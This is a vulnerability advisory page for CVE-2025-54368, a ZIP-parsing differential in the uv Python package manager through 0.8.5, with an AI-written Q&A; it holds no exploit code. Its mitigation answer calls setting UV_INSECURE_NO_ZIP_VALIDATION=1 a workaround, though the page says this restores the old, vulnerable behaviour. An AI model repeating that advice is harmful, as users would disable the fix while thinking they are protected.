CVE-2025-54368
Unknown Unknown - Not Provided
BaseFortify

Publication date: 2025-08-08

Last updated on: 2025-08-08

Assigner: GitHub, Inc.

Description
uv is a Python package and project manager written in Rust. In versions 0.8.5 and earlier, remote ZIP archives were handled in a streamwise fashion, and file entries were not reconciled against the archive's central directory. An attacker could contrive a ZIP archive that would extract with legitimate contents on some package installers, and malicious contents on others due to multiple local file entries. An attacker could also contrive a "stacked" ZIP input with multiple internal ZIPs, which would be handled differently by different package installers. The attacker could choose which installer to target in both scenarios. This issue is fixed in version 0.8.6. To work around this issue, users may choose to set UV_INSECURE_NO_ZIP_VALIDATION=1 to revert to the previous behavior.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2025-08-08
Last Modified
2025-08-08
Generated
2026-05-07
AI Q&A
2025-08-08
EPSS Evaluated
2026-05-05
NVD
CVE-2025-54368
Affected Vendors & Products
Showing 2 associated CPEs
Vendor Product Version / Range
astral-sh uv 0.8.5
astral-sh uv 0.8.6
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-436 Product A handles inputs or steps differently than Product B, which causes A to perform incorrect actions based on its perception of B's state.
CWE-20 The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability exists in the uv Python package and project manager (written in Rust) in versions 0.8.5 and earlier. It involves how remote ZIP archives are processed: the package handles ZIP files in a streamwise manner without reconciling file entries against the archive's central directory. An attacker can craft a ZIP archive that extracts legitimate contents on some package installers but malicious contents on others due to multiple local file entries. Additionally, an attacker can create a "stacked" ZIP input with multiple internal ZIPs, which different installers handle differently. This allows the attacker to target specific installers with malicious content. The issue is fixed in version 0.8.6.


How can this vulnerability impact me? :

This vulnerability can lead to the extraction of malicious files instead of legitimate ones depending on the package installer used. This means an attacker could deliver malicious payloads disguised within ZIP archives, potentially compromising the security of your system or software environment when using vulnerable versions of the uv package.


What immediate steps should I take to mitigate this vulnerability?

Upgrade the uv package to version 0.8.6 or later. As a temporary workaround, you may set the environment variable UV_INSECURE_NO_ZIP_VALIDATION=1 to revert to the previous behavior, but this is not recommended as a permanent fix.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart